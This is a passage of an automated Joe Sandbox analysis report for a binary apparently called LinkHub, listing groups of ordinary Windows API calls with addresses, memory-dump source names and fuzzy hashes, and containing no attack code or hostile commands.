                                                                    • _wcslen.LIBCMT ref: 00CDE924
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00CDE92F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                    • String ID:
                                                                    • API String ID: 3763101759-0
                                                                    • Opcode ID: f1459897b24e9f5f6537c28d917d8863bd11d00fac19f2888f099c314f63628f
                                                                    • Instruction ID: c20f900ad8695687982817b011c30cc141b604fcf1a458c942e18be36ffa23c0
                                                                    • Opcode Fuzzy Hash: f1459897b24e9f5f6537c28d917d8863bd11d00fac19f2888f099c314f63628f
                                                                    • Instruction Fuzzy Hash: 0321A171901224AFDB10AFA8D982BAEB7F8EF55360F144065E918BF381D7709E41DBA1
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • GetCursorPos.USER32(?), ref: 00D09A5D
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D09A72
                                                                    • GetCursorPos.USER32(?), ref: 00D09ABA
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00D09AF0
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: aaa466e1481705bc76595f9f084af62830a384aab758298dd54f6b51f90de0f1
                                                                    • Instruction ID: aa357eab51737bc716edf5878db339f3b72c614861eefe02d7f3cf785d14933e
                                                                    • Opcode Fuzzy Hash: aaa466e1481705bc76595f9f084af62830a384aab758298dd54f6b51f90de0f1
                                                                    • Instruction Fuzzy Hash: 2121A035601118AFCF158F94CC68FFABBB5EB0A320F444055F94A872A2D3319950DB70
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,00D0DC30), ref: 00CDDBA6
                                                                    • GetLastError.KERNEL32 ref: 00CDDBB5
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDDBC4
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00D0DC30), ref: 00CDDC21
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: 2576f7a064ba010613c24943186bd3c3f42b9dfd0a7eee52bcd098b5d39d1104
                                                                    • Instruction ID: 56afd709770d3e4c86744efe49afca284f2d4076f0b082a1e2c7c98e92744253
                                                                    • Opcode Fuzzy Hash: 2576f7a064ba010613c24943186bd3c3f42b9dfd0a7eee52bcd098b5d39d1104
                                                                    • Instruction Fuzzy Hash: 3121A3709143059FC310DF24C88096BBBE8EE99364F104A1FF5AAC73A1D771DA4ADB52
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00D032A6
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D032C0
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D032CE
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00D032DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 1ba0963549e4d391181f23c6dc49f76181fea7a9d60cf36ca45c3321f77ef3f9
                                                                    • Instruction ID: 64f46660a61054521527b508f4e16020f5b7e3e15b41c3980accd304c6b27ebe
                                                                    • Opcode Fuzzy Hash: 1ba0963549e4d391181f23c6dc49f76181fea7a9d60cf36ca45c3321f77ef3f9
                                                                    • Instruction Fuzzy Hash: BA21A131605611AFD7149B24CC45F6ABB99EF85324F28825DF82E8B2D2C771ED41C7E4
                                                                    APIs
                                                                      • Part of subcall function 00CD96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00CD8271,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?), ref: 00CD96F3
                                                                      • Part of subcall function 00CD96E4: lstrcpyW.KERNEL32(00000000,?,?,00CD8271,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD9719
                                                                      • Part of subcall function 00CD96E4: lstrcmpiW.KERNEL32(00000000,?,00CD8271,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?), ref: 00CD974A
                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD828A
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD82B0
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CD90BB,00000000,?,0000001C,?,?,00000000), ref: 00CD82EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: f835414ce66465bcf82574ed0c46a53cd0dd412eb7e2be4630eda1c053942dc9
                                                                    • Instruction ID: 06c3915b295e20df2d89b29494cd99857a85b73fb37c5390a77b1800e6468e2f
                                                                    • Opcode Fuzzy Hash: f835414ce66465bcf82574ed0c46a53cd0dd412eb7e2be4630eda1c053942dc9
                                                                    • Instruction Fuzzy Hash: EC11E13A200341ABCB149F78C844A7A77A9FF48750B10402BFA06C7360EF31D911D7A1
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00D0615A
                                                                    • _wcslen.LIBCMT ref: 00D0616C
                                                                    • _wcslen.LIBCMT ref: 00D06177
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D062B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID:
                                                                    • API String ID: 455545452-0
                                                                    • Opcode ID: 71b8da9cc0f4764e5239fc839360cedc2564b73fccfaa44c3f7a035131adbf9c
                                                                    • Instruction ID: c215431c43ea8d49a22810a0b99af75568b3ecf3d09bc1cb292ac278e719b64f
                                                                    • Opcode Fuzzy Hash: 71b8da9cc0f4764e5239fc839360cedc2564b73fccfaa44c3f7a035131adbf9c
                                                                    • Instruction Fuzzy Hash: 6011AF35500219AADB10DFA49C84BEF7BACEF11350B18402AFA59D61C1E774C951DBB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e2fbad5db74641b1c906dd242d814f36affc5383016d6ee624bc42eea7084c6
                                                                    • Instruction ID: 9f042a173a5bbbc03e76721ab4ba308354e29409e02c6f7e9f96e42d8d3195ee
                                                                    • Opcode Fuzzy Hash: 3e2fbad5db74641b1c906dd242d814f36affc5383016d6ee624bc42eea7084c6
                                                                    • Instruction Fuzzy Hash: 6D018FB26052277EE62126BC6CC0F67661DDF433BCB350325B531A12D1DF608D409160
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CD2394
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD23A6
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD23BC
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD23D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8e01872ed6c47d8f0e4ef0264bae5b8f9b46c074d05b2d8607ee2fded852da2e
                                                                    • Instruction ID: 66cbdc06776e54890853292b7d52f73917f3b67668b048bfa9fe5b6e1bb96d4b
                                                                    • Opcode Fuzzy Hash: 8e01872ed6c47d8f0e4ef0264bae5b8f9b46c074d05b2d8607ee2fded852da2e
                                                                    • Instruction Fuzzy Hash: 8E11093A900218FFEB119BA5CD85F9DBB78FB08750F200192EA11B7290D771AE10DB94
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C71AF4
                                                                    • GetClientRect.USER32(?,?), ref: 00CB31F9
                                                                    • GetCursorPos.USER32(?), ref: 00CB3203
                                                                    • ScreenToClient.USER32(?,?), ref: 00CB320E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: f05a0ad09ca6298b0a153c1c740ad69251a5edd825573bdaeacfec57c0d551a8
                                                                    • Instruction ID: b5cf39b481f40fce79fc32cb21d0330b80eeb69adec702fa81569f64b421c7ee
                                                                    • Opcode Fuzzy Hash: f05a0ad09ca6298b0a153c1c740ad69251a5edd825573bdaeacfec57c0d551a8
                                                                    • Instruction Fuzzy Hash: 50114831A01119EBCB00DFA8C98A9EE77BDEB05350F504452F91AE3240C731BB91EBB1
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CDEB14
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00CDEB47
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CDEB5D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CDEB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 93a3811d91da0f885674cf65b6d67525b8245c95c539e65a4d448b2467d746a9
                                                                    • Instruction ID: 60bebb5abf7b16d2152d5ac667850aecd249a13e8072437067a57559715f3d29
                                                                    • Opcode Fuzzy Hash: 93a3811d91da0f885674cf65b6d67525b8245c95c539e65a4d448b2467d746a9
                                                                    • Instruction Fuzzy Hash: C211DB76900318BBC701BFA89C09A9F7FBDEB46310F54425BF925E7390D674990487B1
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,?,00C9D369,00000000,00000004,00000000), ref: 00C9D588
                                                                    • GetLastError.KERNEL32 ref: 00C9D594
                                                                    • __dosmaperr.LIBCMT ref: 00C9D59B
                                                                    • ResumeThread.KERNEL32(00000000), ref: 00C9D5B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 173952441-0
                                                                    • Opcode ID: 63d28b07c96b08487a7e963f91eff291c5d531c4934cbd52a195913f13597bf2
                                                                    • Instruction ID: 82bdee9c57bdeb9b45f9a1498b14766e7ea9d22890b9cd86b09d3464ad2a1220
                                                                    • Opcode Fuzzy Hash: 63d28b07c96b08487a7e963f91eff291c5d531c4934cbd52a195913f13597bf2
                                                                    • Instruction Fuzzy Hash: 7301F9B24003147BCF116FA9DC0DBAA7B69EF41335F110219F926E71E0CB708901D7A1
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C778B1
                                                                    • GetStockObject.GDI32(00000011), ref: 00C778C5
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C778CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 26beced86bd3faefe1d073b747640f811d5deeb6f26493a7d4f78114711b166d
                                                                    • Instruction ID: 6f98b81972ec65628901ba7889ced068b150cd7e641e6dad7828c570fe62c00d
                                                                    • Opcode Fuzzy Hash: 26beced86bd3faefe1d073b747640f811d5deeb6f26493a7d4f78114711b166d
                                                                    • Instruction Fuzzy Hash: 0711AD7250560CBFDF025F90CC58EEA7B6DFF48364F044216FA19A6260D7719C60EBA2
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CE11D9,00000000,00000000,?,00CA338D,00CE11D9,00000000,00000000,00000000,?,00CA35FE,00000006,FlsSetValue), ref: 00CA3418
                                                                    • GetLastError.KERNEL32(?,00CA338D,00CE11D9,00000000,00000000,00000000,?,00CA35FE,00000006,FlsSetValue,00D13260,FlsSetValue,00000000,00000364,?,00CA31B9), ref: 00CA3424
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CA338D,00CE11D9,00000000,00000000,00000000,?,00CA35FE,00000006,FlsSetValue,00D13260,FlsSetValue,00000000), ref: 00CA3432
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 1e21289d1f01d5bbae7dbd49f78b7aa0dfef927b4f553a53a02329d932913288
                                                                    • Instruction ID: ce22bf2bffc1922ffb6b32a7848df636201cb26ee244048b9ebb5f5139617e53
                                                                    • Opcode Fuzzy Hash: 1e21289d1f01d5bbae7dbd49f78b7aa0dfef927b4f553a53a02329d932913288
                                                                    • Instruction Fuzzy Hash: BF01F732611363ABCB228FB99C54A577F59BF0AB657200620F91AD7280C720DE01C6F0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBA8B
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBAB0
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBABA
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBAED
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 0de0be8da136b07cf0513620baa36881d4635953af40abdae396351e0480545d
                                                                    • Instruction ID: 833cbf9c55f6ab346f742f32c71d67e8f7450f3f9c0dbd5d574b3dd052306572
                                                                    • Opcode Fuzzy Hash: 0de0be8da136b07cf0513620baa36881d4635953af40abdae396351e0480545d
                                                                    • Instruction Fuzzy Hash: 55115E31D00619D7CF00DFE5E9497EEBB78BF09711F124096E645B2340CB709A50DBA5
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00D0888E
                                                                    • ScreenToClient.USER32(?,?), ref: 00D088A6
                                                                    • ScreenToClient.USER32(?,?), ref: 00D088CA
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D088E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: a30ec8f1b53ec4b55e8448877de3985e1be3e3b2be84b1f8d7ae242bad5b1052
                                                                    • Instruction ID: 8b521c631a9a776644af68f7f7a2398e8afcf191e54def8657c23dcd4842edbb
                                                                    • Opcode Fuzzy Hash: a30ec8f1b53ec4b55e8448877de3985e1be3e3b2be84b1f8d7ae242bad5b1052
                                                                    • Instruction Fuzzy Hash: 1E1143B9D0020DAFDB41CF98D884AEEBBB5FB08310F508156E919E3250D735AA54DF60
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CD3712
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD3723
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CD372A
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00CD3731
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 61455cb2e9e5a30969223ed007bce1f6ada1b6fd05b8551e219a0e305d442f08
                                                                    • Instruction ID: 1f04c8be8b87f74751510ba770663a1f9ae399b956348ec2e3b76745143275d7
                                                                    • Opcode Fuzzy Hash: 61455cb2e9e5a30969223ed007bce1f6ada1b6fd05b8551e219a0e305d442f08
                                                                    • Instruction Fuzzy Hash: 9BE06DB11013687ADA2017A29C4DFEB7F6DDB86BA1F51001AF209D2280DAA18A40C2B2
                                                                    APIs
                                                                      • Part of subcall function 00C71F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C71F87
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71F96
                                                                      • Part of subcall function 00C71F2D: BeginPath.GDI32(?), ref: 00C71FAD
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71FD6
                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00D092E3
                                                                    • LineTo.GDI32(?,?,?), ref: 00D092F0
                                                                    • EndPath.GDI32(?), ref: 00D09300
                                                                    • StrokePath.GDI32(?), ref: 00D0930E
                                                                    Memory Dump Source
